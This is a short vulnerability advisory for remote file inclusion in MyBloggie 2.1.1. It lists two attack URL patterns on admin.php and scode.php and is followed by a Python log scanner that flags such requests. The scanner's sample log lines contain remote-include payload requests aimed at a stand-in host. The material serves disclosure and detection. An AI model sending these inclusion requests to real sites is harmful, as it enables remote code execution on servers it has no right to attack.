# MHG Security Team --- MyBloggie 2.1.1 version Remote File Include Vulnerabilities



# Milli-Harekat Advisory ( www.milli-harekat.org )

# MyBloggie <= 2.1.1 version - Remote File Include Vulnerabilities

# Risk : medium

# Class: Remote

# Script : MyBloggie 2.1.1 version

# Msn : erne [at] ernealizm.com

# Credits : ERNE

# Thanks : Dj_ReMix,Eskobar,Blackened,TR_IP,ßy KorsaN,OsL3m7,Poizonbox,Di_lejyoner and All MHG USERS

# Vulnerable :

http://www.site.com/blog/admin.php?mybloggie_root_path=[evil script]

http://www.site.com/blog/scode.php?mybloggie_root_path=[evil script]
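A log check for the two requests listed above, as an added example that is not part of the original advisory: it scans web server access logs for requests to `admin.php` or `scode.php` that carry `mybloggie_root_path`, and marks those whose value points to a remote location. It assumes common/combined log format and that legitimate clients never send this parameter; the log lines, addresses and host names are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

SCRIPTS = {"admin.php", "scode.php"}   # scripts named in the advisory
PARAM = "mybloggie_root_path"          # parameter named in the advisory
# Values that leave the local tree: scheme:, protocol-relative //, UNC \\
REMOTE = re.compile(r"^\s*(?:[a-z][a-z0-9+.\-]+:|//|\\\\)", re.I)
# Common/combined log format: client, request target, status
REQUEST = re.compile(r'^(\S+) \S+ \S+ \[[^\]]*\] "[A-Z]+ (\S+)[^"]*" (\d{3})')

def classify(target):
    """Return None, 'param-set' or 'remote-include' for one request target."""
    parts = urlsplit(target)
    if not any(seg.lower() in SCRIPTS for seg in parts.path.split("/")):
        return None
    # parse_qs percent-decodes names and values, so encoded schemes are seen.
    query = parse_qs(parts.query, keep_blank_values=True)
    values = []
    for name, vals in query.items():
        # PHP turns dots and spaces in parameter names into underscores.
        if name.replace(".", "_").replace(" ", "_") == PARAM:
            values.extend(vals)
    if not values:
        return None
    return "remote-include" if any(REMOTE.match(v) for v in values) else "param-set"

def scan(lines):
    """Return (client, verdict, status, target) for each flagged log line."""
    hits = []
    for line in lines:
        m = REQUEST.match(line)
        if m:
            client, target, status = m.groups()
            verdict = classify(target)
            if verdict:
                hits.append((client, verdict, int(status), target))
    return hits

# Constructed log lines (documentation addresses and hosts, not real traffic).
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Jan/2006:10:00:00 +0000] "GET /blog/admin.php HTTP/1.1" 200 5120',
    '203.0.113.9 - - [01/Jan/2006:10:00:05 +0000] "GET /blog/admin.php?mybloggie_root_path=http://example.invalid/x.txt? HTTP/1.1" 200 310',
    '203.0.113.9 - - [01/Jan/2006:10:00:09 +0000] "GET /blog/scode.php?mybloggie.root.path=%68ttp%3A%2F%2Fexample.invalid%2Fx.txt HTTP/1.1" 200 298',
    '192.0.2.44 - - [01/Jan/2006:10:01:00 +0000] "GET /blog/scode.php?mybloggie_root_path=./ HTTP/1.1" 200 1200',
    '192.0.2.45 - - [01/Jan/2006:10:02:00 +0000] "GET /blog/index.php?mybloggie_root_path=http://example.invalid/ HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(*hit, sep="\t")
```

A `param-set` hit has no remote value but is still worth reviewing, since the parameter name appears in a request at all.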
